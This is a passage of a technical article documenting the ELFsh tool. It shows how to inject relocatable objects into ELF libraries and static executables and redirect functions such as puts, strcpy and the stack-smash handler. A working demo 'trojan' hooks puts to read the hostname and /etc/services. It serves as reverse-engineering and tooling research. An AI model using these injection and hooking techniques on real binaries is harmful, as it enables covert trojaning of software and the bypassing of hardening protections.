+                          void *five, void *six, void *seven)
+ {
+   static int i = 0;
+
+   old_printf("fake_libc_start_main \n");
+   printf("start_main has been run %u \n", i++);
+   return (old___libc_start_main(one, two, three, four, 
+			         five, six, seven));
+ }
+
+ ========= END DUMP 32 =========
+
+	   
+	   The elfsh script that allow for the modification is :
+
+
+ ========= BEGIN DUMP 33 =========
+
+ elfsh@WTH $ cat relinject.esh
+ #!../../../vm/elfsh
+
+ load main
+ load simple.o
+
+ reladd 1 2
+
+ redir main fake_main
+ redir __stack_smash_handler fake_stack_smash_handler
+ redir __libc_start_main fake_libc_start_main
+ redir strcpy fake_strcpy
+
+ save fake_main
+
+ quit
+
+ ========= END DUMP 33 =========
+
+
+	   Now let's see this in action !
+
+
+ ========= BEGIN DUMP 34 =========
+ elfsh@WTH $ ./relinject.esh
+
+
+         The ELF shell 0.65 (32 bits built) .::.
+
+         .::. This software is under the General Public License V.2
+         .::. Please visit http://www.gnu.org
+
+ ~load main
+
+ [*] Sun Jul 31 17:24:20 2005 - New object main loaded
+
+ ~load simple.o
+
+ [*] Sun Jul 31 17:24:20 2005 - New object simple.o loaded
+
+ ~reladd 1 2
+
+ [*] ET_REL simple.o injected succesfully in ET_DYN main
+
+ ~redir main fake_main
+
+ [*] Function main redirected to addr 0x00005154 <fake_main>
+
+ ~redir __stack_smash_handler fake_stack_smash_handler
+
+ [*] Function __stack_smash_handler redirected to addr 
+     0x00005203 <fake_stack_smash_handler>
+
+ ~redir __libc_start_main fake_libc_start_main
+
+ [*] Function __libc_start_main redirected to addr 
+     0x00005281 <fake_libc_start_main>
+
+ ~redir strcpy fake_strcpy
+
+ [*] Function strcpy redirected to addr 0x000051BD <fake_strcpy>
+
+ ~save fake_main
+
+ [*] Object fake_main saved successfully
+
+ ~quit
+
+ [*] Unloading object 1 (simple.o)
+ [*] Unloading object 2 (main) *
+         .:: Bye -:: The ELF shell 0.65
+ 
+ ========= END DUMP 34 =========
+
+
+	   What about the result ?
+
+
+ ========= BEGIN DUMP 35 =========
+
+ elfsh@WTH $ ./fake_main
+ fake_libc_start_main
+ start_main has been run 0
+ I am the main function, I have 1 argc and my argv is BF9A6F54 yupeelala
+ fake_main is calling write !
+ 0x800068c8 main(argc=0xbf9a6e80, argv=0xbf9a6e2c, envp=0xbf9a6e28, 
+ 	        auxv=0xbf9a6e24) __guard=0xb7f78148
+ ssp-all (Stack) Triggering an overflow by copying [20] of data into [10]
+ of space
+ The fucker wants to copy 01234567890123456789 at address BF9A6E50
+ calling printf from stack smashing handler 0
+ Same player play again [damaged = 39383736]
+ A second (2) printf from the handler
+
+ elfsh@WTH $ ./fake_main AAAA
+ fake_libc_start_main
+ start_main has been run 0
+ I am the main function, I have 2 argc and my argv is BF83A164 yupeelala
+ fake_main is calling write !
+ 0x800068c8 main(argc=0xbf83a090, argv=0xbf83a03c, envp=0xbf83a038, 
+	        auxv=0xbf83a034) __guard=0xb7f09148
+ ssp-all (Stack) Copying [4] of data into [10] of space
+ The fucker wants to copy AAAA at address BF83A060
+
+ elfsh@WTH $ ./fake_main AAAAAAAAAAAAAAA
+ fake_libc_start_main
+ start_main has been run 0
+ I am the main function, I have 2 argc and my argv is BF8C7F24 yupeelala
+ fake_main is calling write !
+ 0x800068c8 main(argc=0xbf8c7e50, argv=0xbf8c7dfc, envp=0xbf8c7df8, 
+                 auxv=0xbf8c7df4) __guard=0xb7f97148
+ ssp-all (Stack) Copying [15] of data into [10] of space
+ The fucker wants to copy AAAAAAAAAAAAAAA at address BF8C7E20
+
+ ========= END DUMP 35 =========
+
+
+	No problem there : strcpy, main, libc_start_main and
+	__stack_smash_handler are redirected on our own routines
+	as the output shows. We also call write that was not available
+	in the original binary, which show that EXTPLT also works on
+	ET_DYN objects, the cool stuff beeing that it worked without
+	any modification.
+
+	In the current release (0.65rc1) there is a limitation on ET_DYN
+	however. We have to avoid non-initialized variables because 
+	that would add some entries in relocation tables. This is not
+	a problem to add some since we also copy .rel.got (rel.dyn) in
+	EXTPLT on ET_DYN, but it is not implemented for now.
+
+
+
+---[ C. Extending static executables
+
+
+
+        Now we would like to be able to debug static binary the same way 
+	we do for dynamic ones. Since we cannot inject e2dbg using 
+	DT_NEEDED dependances on static binaries, the idea is to inject 
+	e2dbg as ET_REL into ET_EXEC since it is possible on static 
+	binaries. E2dbg as many more dependancies than a simple host.c 
+	program. The extended idea is to inject the missing part of 
+	static libraries when it is necessary.
+
+	We have to resolve dependancies on-the-fly while ET_REL injection
+        is performed. For that we will use a simple recursive algorithm
+	on the existing relocation code : when a symbol is not found
+	at relocation time, either it is a old_* symbol so it is delayed
+	in a second stage relocation time (Indeed, old symbols appears
+	at redirection time, which is done after the injection of the 
+	ET_REL file so we miss that symbol at first stage), or the 
+	function symbol is definitely unknown and we need to add 
+	information so that the rtld can resolve it as well.
+
+        To be able to find the suitable ET_REL to inject, ELFsh load all
+        the ET_REL from static library (.a) then the resolution is done
+        using this pool of binaries. The workspace feature of elfsh is
+	quite useful for this, when sessions are performed on more than
+	a thousand of ET_EXEC ELF files at a time (after extracting
+	modules from libc.a and others static librairies, for instance).
+
+        Circular dependancies are solved by using second stage relocation
+        when the required symbol is in a file that is being injected after
+	the current file. The same second stage relocation mechanism
+	is used when we need to relocate ET_REL objects that use OLD
+	symbols. Since OLD symbols are injected at redirection time and
+	ET_REL files should be injected before (so that we can use
+	functions from the ET_REL object as hook functions), we do not
+	have OLD symbols at relocation time. The second stage relocation
+	is then triggered at save time (for on disk modifications) or
+	recursively solved when injecting multiple ET_REL with circular
+	relocation dependances.
+
+        A problem is remaining, as for now we had one PT_LOAD by injected
+        section, we quickly reach more than 500 PT_LOAD. This seems to be
+        a bit too much for a regular ELF static file. We need to improve
+	the PT_LOAD allocation mechanism so that we can inject bigger
+	extension to such host binaries.
+
+        This technique provide the same features as EXTPLT but for static
+        binaries : we can inject what we want (regardless of what the host
+        binary contains).
+
+        So here is a smaller working example:
+
+
+ ========= BEGIN DUMP 36 =========
+
+ elfsh@WTH $ cat host.c
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <unistd.h>
+
+ int     legit_func(char *str)
+ {
+   puts("legit func !");
+   return (0);
+ }
+
+ int main()
+ {
+   char  *str;
+   char  buff[BUFSIZ];
+   read(0, buff, BUFSIZ-1);
+
+   puts("First_puts");
+
+   puts("Second_puts");
+
+   fflush(stdout);
+
+   legit_func("test");
+
+   return (0);
+ }
+
+ elfsh@WTH $ file a.out
+ a.out: ELF 32-bit LSB executable, Intel 80386, statically linked, 
+ not stripped
+
+ elfsh@WTH $ ./a.out
+
+ First_puts
+ Second_puts
+ legit func !
+
+ ========= END DUMP 36 =========
+
+	   
+	   The injected file source code is as follow :
+
+
+ ========= BEGIN DUMP 37 =========
+
+ elfsh@WTH $ cat rel2.c
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <unistd.h>
+ #include <string.h>
+ #include <netdb.h>
+
+
+ int     glvar_testreloc = 42;
+ int     glvar_testreloc_bss;
+ char    glvar_testreloc_bss2;
+ short   glvar_testreloc_bss3;
+
+
+ int     hook_func(char *str)
+ {
+   int sd;
+
+   printf("hook func %s !\n", str);
+
+   return (old_legit_func(str));
+ }
+
+
+ int     puts_troj(char *str)
+ {
+   int   local = 1;
+   char  *str2;
+   int   fd;
+   char  name[16];
+   void  *a;
+
+   str2 = malloc(10);
+   *str2 = 'Z';
+   *(str2 + 1) = 0x00;
+
+   glvar_testreloc_bss  = 43;
+   glvar_testreloc_bss2 = 44;
+   glvar_testreloc_bss3 = 45;
+
+   memset(name, 0, 16);
+
+   printf("Trojan injected ET_REL takes control now "
+          "[%s:%s:%u:%u:%hhu:%hu:%u] \n",
+          str2, str,
+          glvar_testreloc,
+          glvar_testreloc_bss,
+          glvar_testreloc_bss2,
+          glvar_testreloc_bss3,
+          local);
+
+  free(str2);
+
+  gethostname(name, 15);
+  printf("hostname : %s\n", name);
+
+  printf("printf called from puts_troj [%s] \n", str);
+
+  fd = open("/etc/services", 0, O_RDONLY);
+
+  if (fd)
+    {
+     if ((a = mmap(0, 100, PROT_READ, MAP_PRIVATE, fd, 0)) == (void *) -1)
+        {
+          perror("mmap");
+          close(fd);
+          printf("mmap failed : fd: %d\n", fd);
+          return (-1);
+        }
+      printf("-=-=-=-=-=- BEGIN /etc/services %d -=-=-=-=-=\n", fd);
+      printf("host : %.60s\n", (char *) a);
+      printf("-=-=-=-=-=- END   /etc/services %d -=-=-=-=-=\n", fd);
+      printf("mmap succeed fd : %d\n", fd);
+      close(fd);
+    }
+
+
+   old_puts(str);
+   fflush(stdout);
+   return (0);
+ }
+
+ ========= END DUMP 37 =========
+	   
+
+	   The load_lib.esh script, generated using a small bash
+	   script, looks like this :
+
+
+ ========= BEGIN DUMP 38 =========
+
+ elfsh@WTH $ head -n 10 load_lib.esh
+ #!../../../vm/elfsh
+ load libc/init-first.o
+ load libc/libc-start.o
+ load libc/sysdep.o
+ load libc/version.o
+ load libc/check_fds.o
+ load libc/libc-tls.o
+ load libc/elf-init.o
+ load libc/dso_handle.o
+ load libc/errno.o
+ 
+ ========= END DUMP 38 =========
+
+
+           Here is the injection ELFsh script:
+
+
+ ========= BEGIN DUMP 39 =========
+
+ elfsh@WTH $ cat relinject.esh
+ #!../../../vm/elfsh
+
+ exec gcc -g3 -static host.c
+ exec gcc -g3 -static rel2.c -c
+
+ load a.out
+ load rel2.o
+
+ source ./load_lib.esh
+
+ reladd 1 2
+
+ redir puts puts_troj
+ redir legit_func hook_func
+
+ save fake_aout
+
+ quit
+
+ ========= END DUMP 39 =========
+
+
+           Stripped output of the injection :
+
+
+ ========= BEGIN DUMP 40 =========
+ elfsh@WTH $ ./relinject.esh
+
+         The ELF shell 0.65 (32 bits built) .::.
+
+         .::. This software is under the General Public License V.2
+         .::. Please visit http://www.gnu.org
+
+ ~exec gcc -g3 -static host.c
+
+ [*] Command executed successfully
+
+ ~exec gcc -g3 -static rel2.c -c
+
+ [*] Command executed successfully
+
+ ~load a.out
+ [*] Sun Jul 31 16:37:32 2005 - New object a.out loaded
+
+ ~load rel2.o
+ [*] Sun Jul 31 16:37:32 2005 - New object rel2.o loaded
+
+ ~source ./load_lib.esh
+ ~load libc/init-first.o
+ [*] Sun Jul 31 16:37:33 2005 - New object libc/init-first.o loaded
+
+ ~load libc/libc-start.o
+ [*] Sun Jul 31 16:37:33 2005 - New object libc/libc-start.o loaded
+
+ ~load libc/sysdep.o
+ [*] Sun Jul 31 16:37:33 2005 - New object libc/sysdep.o loaded
+
+ ~load libc/version.o
+ [*] Sun Jul 31 16:37:33 2005 - New object libc/version.o loaded
+
+ [[... 1414 files later ...]]
+
+ [*] ./load_lib.esh sourcing -OK-
+
+ ~reladd 1 2
+
+ [*] ET_REL rel2.o injected succesfully in ET_EXEC a.out
+
+ ~redir puts puts_troj
+
+ [*] Function puts redirected to addr 0x080B7026 <puts_troj>
+
+ ~redir legit_func hook_func
+
+ [*] Function legit_func redirected to addr 0x080B7000 <hook_func>
+
+ ~save fake_aout
+
+ [*] Object fake_aout saved successfully
+
+ ~quit
+
+ [*] Unloading object 1 (libpthreadnonshared/pthread_atfork.oS)
+ [*] Unloading object 2 (libpthread/ptcleanup.o)
+ [*] Unloading object 3 (libpthread/pthread_atfork.o)
+ [*] Unloading object 4 (libpthread/old_pthread_atfork.o)
+
+ [[... 1416 files later ...]]
+
+         .:: Bye -:: The ELF shell 0.65
+
+ ========= END DUMP 40 =========
+
+
+           Does it works ?
+
+
+ ========= BEGIN DUMP 41 =========
+
+ elfsh@WTH $ ./fake_aout
+
+ Trojan injected ET_REL takes control now [Z:First_puts:42:43:44:45:1]
+ hostname : WTH
+ printf called from puts_troj [First_puts]
+ -=-=-=-=-=- BEGIN /etc/services 3 -=-=-=-=-=
+ host : # /etc/services
+ #
+ # Network services, Internet style
+ #
+ # Not
+ -=-=-=-=-=- END   /etc/services 3 -=-=-=-=-=
+ mmap succeed fd : 3
+ First_puts
+ Trojan injected ET_REL takes control now [Z:Second_puts:42:43:44:45:1]
+ hostname : WTH
+ printf called from puts_troj [Second_puts]
+ -=-=-=-=-=- BEGIN /etc/services 3 -=-=-=-=-=
+ host : # /etc/services
+ #
+ # Network services, Internet style
+ #
+ # Not
+ -=-=-=-=-=- END   /etc/services 3 -=-=-=-=-=
+ mmap succeed fd : 3
+ Second_puts
+ hook func test !
+ Trojan injected ET_REL takes control now [Z:legit func !:42:43:44:45:1]
+ hostname : WTH
+ printf called from puts_troj [legit func !]
+ -=-=-=-=-=- BEGIN /etc/services 3 -=-=-=-=-=
+ host : # /etc/services
+ #
+ # Network services, Internet style
+ #
+ # Not
+ -=-=-=-=-=- END   /etc/services 3 -=-=-=-=-=
+ mmap succeed fd : 3
+ legit func !
+ ========= END DUMP 41 ========= 
+
+
+           Yes, It's working. Now have a look at the fake_aout static
+	   file :
+
+
+
+ ========= BEGIN DUMP 42 =========
+
+ elfsh@WTH $ ../../../vm/elfsh  -f ./fake_aout -s
+
+ [*] Object ./fake_aout has been loaded (O_RDONLY)
+
+ [SECTION HEADER TABLE .::. SHT is not stripped]
+ [Object ./fake_aout]
+
+ [000] 0x00000000 -------                             foff:000000 sz:00000
+ [001] 0x080480D4 a------ .note.ABI-tag               foff:069844 sz:00032
+ [002] 0x08048100 a-x---- .init                       foff:069888 sz:00023
+ [003] 0x08048120 a-x---- .text                       foff:69920 sz:347364
+ [004] 0x0809CE10 a-x---- __libc_freeres_fn           foff:417296 sz:02222
+ [005] 0x0809D6C0 a-x---- .fini                       foff:419520 sz:00029
+ [006] 0x0809D6E0 a------ .rodata                     foff:419552 sz:88238
+ [007] 0x080B2F90 a------ __libc_atexit               foff:507792 sz:00004
+ [008] 0x080B2F94 a------ __libc_subfreeres           foff:507796 sz:00036
+ [009] 0x080B2FB8 a------ .eh_frame                   foff:507832 sz:03556
+ [010] 0x080B4000 aw----- .ctors                      foff:512000 sz:00012
+ [011] 0x080B400C aw----- .dtors                      foff:512012 sz:00012
+ [012] 0x080B4018 aw----- .jcr                        foff:512024 sz:00004
+ [013] 0x080B401C aw----- .data.rel.ro                foff:512028 sz:00044
+ [014] 0x080B4048 aw----- .got                        foff:512072 sz:00004
+ [015] 0x080B404C aw----- .got.plt                    foff:512076 sz:00012
+ [016] 0x080B4060 aw----- .data                       foff:512096 sz:03284
+ [017] 0x080B4D40 aw----- .bss                        foff:515380 sz:04736
+ [018] 0x080B5FC0 aw----- __libc_freeres_ptrs         foff:520116 sz:00024
+ [019] 0x080B6000 aw----- rel2.o.bss                  foff:520192 sz:04096
+ [020] 0x080B7000 a-x---- rel2.o.text                 foff:524288 sz:04096
+ [021] 0x080B8000 aw----- rel2.o.data                 foff:528384 sz:00004
+ [022] 0x080B9000 a------ rel2.o.rodata               foff:532480 sz:04096
+ [023] 0x080BA000 a-x---- .elfsh.hooks                foff:536576 sz:00032
+ [024] 0x080BB000 aw----- libc/printf.o.bss           foff:540672 sz:04096
+ [025] 0x080BC000 a-x---- libc/printf.o.text          foff:544768 sz:04096
+ [026] 0x080BD000 aw----- libc/gethostname.o.bss      foff:548864 sz:04096
+ [027] 0x080BE000 a-x---- libc/gethostname.o.text     foff:552960 sz:04096
+ [028] 0x080BF000 aw----- libc/perror.o.bss           foff:557056 sz:04096
+ [029] 0x080C0000 a-x---- libc/perror.o.text          foff:561152 sz:04096
+ [030] 0x080C1000 a--ms-- libc/perror.o.rodata.str1.1 foff:565248 sz:04096
+ [031] 0x080C2000 a--ms-- libc/perror.o.rodata.str4.4 foff:569344 sz:04096
+ [032] 0x080C3000 aw----- libc/dup.o.bss              foff:573440 sz:04096
+ [033] 0x080C4000 a-x---- libc/dup.o.text             foff:577536 sz:04096
+ [034] 0x080C5000 aw----- libc/iofdopen.o.bss         foff:581632 sz:04096
+ [035] 0x00000000 ------- .comment                    foff:585680 sz:20400
+ [036] 0x080C6000 a-x---- libc/iofdopen.o.text        foff:585728 sz:04096
+ [037] 0x00000000 ------- .debug_aranges              foff:606084 sz:00136
+ [038] 0x00000000 ------- .debug_pubnames             foff:606220 sz:00042
+ [039] 0x00000000 ------- .debug_info                 foff:606262 sz:01600
+ [040] 0x00000000 ------- .debug_abbrev               foff:607862 sz:00298
+ [041] 0x00000000 ------- .debug_line                 foff:608160 sz:00965
+ [042] 0x00000000 ------- .debug_frame                foff:609128 sz:00068
+ [043] 0x00000000 ------- .debug_str                  foff:609196 sz:00022
+ [044] 0x00000000 ------- .debug_macinfo              foff:609218 sz:28414
+ [045] 0x00000000 ------- .shstrtab                   foff:637632 sz:00632
+ [046] 0x00000000 ------- .symtab                     foff:640187 sz:30192
+ [047] 0x00000000 ------- .strtab                     foff:670379 sz:25442
+
+ [*] Object ./fake_aout unloaded
+
+ elfsh@WTH $ ../../../vm/elfsh  -f ./fake_aout -p
+
+ [*] Object ./fake_aout has been loaded (O_RDONLY)
+
+ [Program Header Table .::. PHT]
+ [Object ./fake_aout]
+
+ [00] 0x8037000 -> 0x80B3D9C r-x memsz(511388) foff(000000) =>Loadable seg
+ [01] 0x80B4000 -> 0x80B7258 rw- memsz(012888) foff(512000) =>Loadable seg
+ [02] 0x80480D4 -> 0x80480F4 r-- memsz(000032) foff(069844) =>Aux. info.
+ [03] 0x0000000 -> 0x0000000 rw- memsz(000000) foff(000000) =>Stackflags
+ [04] 0x0000000 -> 0x0000000 --- memsz(000000) foff(000000) =>New PaXflags
+ [05] 0x80B6000 -> 0x80B7000 rwx memsz(004096) foff(520192) =>Loadable seg
+ [06] 0x80B7000 -> 0x80B8000 rwx memsz(004096) foff(524288) =>Loadable seg
+ [07] 0x80B8000 -> 0x80B8004 rwx memsz(000004) foff(528384) =>Loadable seg
+ [08] 0x80B9000 -> 0x80BA000 rwx memsz(004096) foff(532480) =>Loadable seg
+ [09] 0x80BA000 -> 0x80BB000 rwx memsz(004096) foff(536576) =>Loadable seg
+ [10] 0x80BB000 -> 0x80BC000 rwx memsz(004096) foff(540672) =>Loadable seg
+ [11] 0x80BC000 -> 0x80BD000 rwx memsz(004096) foff(544768) =>Loadable seg
+ [12] 0x80BD000 -> 0x80BE000 rwx memsz(004096) foff(548864) =>Loadable seg
+ [13] 0x80BE000 -> 0x80BF000 rwx memsz(004096) foff(552960) =>Loadable seg
+ [14] 0x80BF000 -> 0x80C0000 rwx memsz(004096) foff(557056) =>Loadable seg
+ [15] 0x80C0000 -> 0x80C1000 rwx memsz(004096) foff(561152) =>Loadable seg
+ [16] 0x80C1000 -> 0x80C2000 rwx memsz(004096) foff(565248) =>Loadable seg
+ [17] 0x80C2000 -> 0x80C3000 rwx memsz(004096) foff(569344) =>Loadable seg
+ [18] 0x80C3000 -> 0x80C4000 rwx memsz(004096) foff(573440) =>Loadable seg
+ [19] 0x80C4000 -> 0x80C5000 rwx memsz(004096) foff(577536) =>Loadable seg
+ [20] 0x80C5000 -> 0x80C6000 rwx memsz(004096) foff(581632) =>Loadable seg
+ [21] 0x80C6000 -> 0x80C7000 rwx memsz(004096) foff(585728) =>Loadable seg
+
+ [SHT correlation]
+ [Object ./fake_aout]
+
+ [*] SHT is not stripped
+
+ [00] PT_LOAD            .note.ABI-tag .init .text __libc_freeres_fn .fini
+                         .rodata __libc_atexit __libc_subfreeres .eh_frame
+ [01] PT_LOAD           .ctors .dtors .jcr .data.rel.ro .got .got.plt 
+			.data
+                        .bss __libc_freeres_ptrs
+ [02] PT_NOTE           .note.ABI-tag
+ [03] PT_GNU_STACK
+ [04] PT_PAX_FLAGS
+ [05] PT_LOAD           rel2.o.bss
+ [06] PT_LOAD           rel2.o.text
+ [07] PT_LOAD           rel2.o.data
+ [08] PT_LOAD           rel2.o.rodata
+ [09] PT_LOAD           .elfsh.hooks
+ [10] PT_LOAD           libc/printf.o.bss
+ [11] PT_LOAD           libc/printf.o.text
+ [12] PT_LOAD           libc/gethostname.o.bss
+ [13] PT_LOAD           libc/gethostname.o.text
+ [14] PT_LOAD           libc/perror.o.bss
+ [15] PT_LOAD           libc/perror.o.text
+ [16] PT_LOAD           libc/perror.o.rodata.str1.1
+ [17] PT_LOAD           libc/perror.o.rodata.str4.4
+ [18] PT_LOAD           libc/dup.o.bss
+ [19] PT_LOAD           libc/dup.o.text
+ [20] PT_LOAD           libc/iofdopen.o.bss |.comment
+ [21] PT_LOAD           libc/iofdopen.o.text
+ [*] Object ./fake_aout unloaded
+
+ ========= END DUMP 42 =========
+
+
+         We can notice the ET_REL really injected : printf.o@libc,
+         dup.o@libc, gethostname.o@libc, perror.o@libc and
+         iofdopen.o@libc.
+
+         Each injected file create several PT_LOAD segments. For this
+	 example it is okay, but for injecting E2dbg that is really too 
+	 much.
+
+         This technique will be improved as soon as possible by reusing
+         PT_LOAD entry when this is possible.
+
+
+
+----[ D. Architecture independant algorithms
+
+
+
+      In this part, we give all the architecture independent algorithms
+      that were developed for the new residency techniques in memory, 
+      ET_DYN libraries, or static executables.
+
+      The new generic ET_REL injection algorithm is not that different 
+      from the one presented in the first Cerberus Interface article [0], 
+      that is why we only give it again in its short form. However, the 
+      new algorithm has improved in modularity and portability. We will 
+      detail some parts of the algorithm that were not explained in 
+      previous articles. The implementation mainly takes place in 
+      elfsh_inject_etrel() in the relinject.c file :
+
+      
+      New generic relocation algorithm
+     +--------------------------------+
+
+      1/ Inject ET_REL BSS after the HOST BSS in a dedicated section (new)
+
+      2/ FOREACH section in ET_REL object
+       [
+	  IF [ Section is allocatable and Section is not BSS ]
+	  [
+		- Inject section in Host file or memory
+	  ]
+       ]
+       
+      3/ Fuze ET_REL and host file symbol tables
+
+      4/ Relocate the ET_REL object (STAGE 1)
+
+      5/ At save time, relocate the ET_REL object 
+         (STAGE 2 for old symbols relocations)
+
+
+      We only had one relocation stage in the past. We had to use another
+      one since not all requested symbols are available (like old symbols
+      gained from CFLOW redirections that may happen after the ET_REL 
+      injection). For ondisk modifications, the second stage relocation 
+      is done at save time.
+
+      Some steps in this algorithm are quite straightforward, such as 
+      step 1 and step 3. They have been explained in the first Cerberus 
+      article [0], however the BSS algorithm has changed for compatibility
+      with ET_DYN files and multiple ET_REL injections. Now the BSS is 
+      injected just as other sections, instead of adding a complex BSS 
+      zones algorithm for always keeping one bss in the program.
+
+      
+       ET_DYN / ET_EXEC section injection algorithm
+      +--------------------------------------------+
+
+
+      Injection algorithm for DATA sections does not change between ET_EXEC
+      and ET_DYN files. However, code sections injection slighly changed 
+      for supporting both binaries and libraries host files. Here is the 
+      new algorithm for this operation :
+
+      * Find executable PT_LOAD
+      * Fix injected section size for page size congruence
+
+      IF [ Hostfile is ET_EXEC ]
+      [	 
+	* Set injected section vaddr to lowest mapped section vaddr
+	* Substract new section size to new section virtual address
+      ]
+      ELSE IF [ Hostfile is ET_DYN ]
+      [
+	* Set injected section vaddr to lowest mapped section vaddr
+      ]
+      
+      * Extend code segment size by newly injected section size
+
+      IF [ Hostfile is ET_EXEC ]
+      [
+        * Substract injected section vaddr to executable PT_LOAD vaddr
+      ] 
+
+      FOREACH [ Entry in PHT ]
+      [
+	 IF [ Segment is PT_PHDR and Hostfile is ET_EXEC ]
+	 [
+	   * Substract injected section size to segment p_vaddr / p_paddr
+	 ]
+	 ELSE IF [ Segment stands after extended PT_LOAD ]
+	 [
+	   * Add injected section size to segment p_offset
+	   IF [ Hostfile is ET_DYN ]
+	   [
+		* Add injected section size to segment p_vaddr and p_paddr
+	   ]
+	 ]
+      ]
+
+      IF [ Hostfile is ET_DYN ]
+      [
+	FOREACH [ Relocation entry in every relocation table ]
+	[
+	     IF [ Relocation offset points after injected section ]
+	     [
+	        * Shift relocation offset from injected section size
+	     ]
+	]
+
+	* Shift symbols from injected section size when pointing after it
+	* Shift dynamic syms from injected section size (same condition)
+	* Shift dynamic entries D_PTR's from injected section size
+	* Shift GOT entries from injected section size
+	* If existing, Shift ALTGOT entries from injected section size
+	* Shift DTORS and CTORS the same way
+	* Shift the entry point in ELF header the same way
+      ]
+
+      * Inject new SECTION symbol on injected code
+
+
+       Static ET_EXEC section injection algorithm
+      +------------------------------------------+
+
+
+      This algorithm is used to insert sections inside static binaries. It
+      can be found in libelfsh/inject.c in elfsh_insert_static_section() :
+
+      * Pad the injected section size to stay congruent to page size
+      * Create a new PT_LOAD program header whoose bounds match the 
+        new section bounds.
+      * Insert new section using classical algorithm
+      * Insert new program header in PHT
+
+
+       Runtime section injection algorithm in memory
+      +---------------------------------------------+
+      
+      
+      This algorithm can be found in libelfsh/inject.c in the function
+      elfsh_insert_runtime_section() :
+
+      * Create a new PT_LOAD program header 
+      * Insert SHT entry for new runtime section 
+        (so we keep a static map up-to-date)
+      * Insert new section using the classical algorithm
+      * Insert new PT_LOAD in Runtime PHT table (RPHT) with same bounds
+
+
+      Runtime PHT is a new table that we introduced so that we can 
+      separate segments regulary mapped by the dynamic linker (original
+      PHT segments) from runtime injected segments. This may lead to an 
+      easier algorithm for binary reconstruction from its memory image 
+      in the future.            
+
+      We will detail now the core (high level) relocation algorithm as 
+      implemented in elfsh_relocate_object() and 
+      elfsh_relocate_etrel_section() functions in libelfsh/relinject.c . 
+      This code is common for all types of host files and for all 
+      relocation stages. It is used at STEP 4 of the general algorithm:
+
+      
+      Core portable relocation algorithm
+     +----------------------------------+
+
+      This algorithm has never been explained in any paper. Here it is :
+
+
+      FOREACH Injected ET_REL sections inside the host file
+      [
+	FOREACH relocation entry in ET_REL file
+	[
+	   * Find needed symbol in ET_REL for this relocation
+	   IF [ Symbol is COMMON or NOTYPE ]
+	   [	   
+		   * Find the corresponding symbol in Host file.
+		   IF [ Symbol is NOT FOUND ]
+		   [
+		      IF [ symbol is OLD and RELOCSTAGE == 1 ]
+		      [
+			 * Delay relocation for it
+		      ]
+		      ELSE
+		      [
+		        IF [ ET_REL symbol type is NOTYPE ]
+			[
+			    * Request a new PLT entry and use its address
+			     for performing relocation (EXTPLT algorithm)
+			]
+			ELSE IF [ Host file is STATIC ]
+			[
+			    * Perform EXTSTATIC technique (next algorithm)
+			]
+			ELSE
+			[
+			    * Algorithm failed, return ERROR
+			]
+		      ]
+		   ]
+		   ELSE
+		   [
+		      * Use host file's symbol value
+		   ]
+	   ]
+	   ELSE
+	   [
+		* Use injected section base address as symbol value
+	   ]
+	   - Relocate entry (switch/case architecture dependant handler)
+	]
+      ]
+      
+
+      EXTSTATIC relocation extension algorithm
+     +----------------------------------------+
+
+      In case the host file is a static file, we can try to get the 
+      unknown symbol from relocatables files from static libraries that 
+      are available on disk. An example of use of this EXTSTATIC technique
+      is located in the testsuite/etrel_inject/ directory.
+
+      Here is the EXTSTATIC algorithm that comes at the specified place
+      in the  previous algorithm for providing the same functionality as
+      EXTPLT but for static binaries :
+
+      
+      FOREACH loaded ET_REL objects in ELFSH
+      [
+	 IF [ Symbol is found anywhere in current analyzed ET_REL ]
+	 [
+	     IF [ Found symbol is strongest than current result ]
+	     [
+	        * Update best symbol result and associated ET_REL file	
+	     ]
+	     ELSE
+	     [
+	        * Discard current iteration result
+	     ]
+	 ]
+      ]
+      * Inject the ET_REL dependency inside Host file
+      * Use newly injected symbol in hostfile as relocation symbol in core
+        relocation algorithm.
+
+
+       Strongest symbol algorithm
+      +--------------------------+
+
+      When we have to choose between multiple symbols that have the same
+      name in different objects (either during static or runtime 
+      injection), we use this simple algorithm to determine which one 
+      to use :
+
+
+      IF [ Current chosen symbol has STT_NOTYPE ]
+      [
+         * Symbol becomes temporary choice
+      ]
+      ELSE IF [ Candidate symbol has STT_NOTYPE ]
+      [
+         * Symbol becomes temporary choice
+      ]
+      ELSE IF [ Candidate symbol binding > Chosen symbol binding ]
+      [
+	 * Candidate symbol becomes Chosen symbol
+      ]
+
+
+
+-------[ VI. Past and present
+
+
+	 In the past we have shown that ET_REL injection into 
+	 non-relocatable ET_EXEC object is possible. This paper presented 
+	 multiple extensions and ports to this residency technique 
+	 (ET_DYN and static executables target). Coupled to the EXTPLT 
+	 technique that allow for a complete post-linking of the host 
+	 file, we can add function definitions and use unknown functions 
+	 in the software extension. All those static injection 
+	 techniques worse when all PaX options are enabled on the 
+	 modified binary. Of course, the position independant and stack 
+	 smashing protection features of hardened Gentoo does not protect
+	 anything when it comes to binary manipulation, either performed
+	 on disk or at runtime.
+
+	 We have also shown that it is possible to debug without using 
+	 the ptrace system call, which open the door for new reverse 
+	 engineering and embedded debugging methodology that bypass known 
+	 anti-debugging techniques. The embedded debugger is not 
+	 completely PaX proof and it is still necessary to disable the 
+	 mprotect flag. Even if it does not sound like a real problem, 
+	 we are still investigating on how to put breakpoints (e.g. 
+	 redirections) without disabling it.
+
+	 Our core techniques are portable to many architectures (x86, 
+	 alpha, mips, sparc) on both 32bits and 64bits files. However 
+	 our proof of concept debugger was done for x86 only. We believe 
+	 that our techniques are portable enough to be able to provide
+	 the debugger for other architectures without much troubles.
+
+	 Share and enjoy the framework, contributions are welcome.
+
+
+-------[ VII. Greetings  
+
+
+	 We thank all the peoples at the WhatTheHack party 2005 in 
+	 Netherlands. We add much fun with you guys and again we will 
+	 come in the future. 
+
+	 Special thanks go to andrewg for teaching us the sigaction 
+	 technique, dvorak for his interest in the optimization on the
+	 the ALTPLT technique version 2 for the SPARC architecture,
+	 sk for libasm, and solar for providing us the ET_DYN pie/ssp
+	 testsuite.
+
+	 Respects go to Devhell Labs, the PaX team, Phrackstaff, GOBBLES,
+	 MMHS, ADM, and Synnergy Networks. Final shoutouts to s/ash from 
+	 RTC for driving us to WTH and the Coconut Crew for everything 
+	 and the rest, you know who you are.
+
+
+-------[ VIII. References
+
+
+ [0] The Cerberus ELF Interface				mayhem
+     http://www.phrack.org/show.php?p=61&a=8
+
+ [1] The GNU debugger					GNU project
+     http://www.gnu.org/software/gdb/
+
+ [2] PaX / grsecurity					The PaX team
